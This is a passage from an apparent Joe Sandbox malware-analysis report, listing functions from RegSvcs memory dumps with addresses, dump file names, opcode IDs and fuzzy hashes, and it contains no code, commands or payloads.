                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00860060 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008601D4 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0086010C Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00861148 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008607AC Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00861930 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085F938 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FAB8 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FA20 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FA50 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FBE8 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FB50 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FC30 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00860C40 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FC48 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00861D80 Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FD5C Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
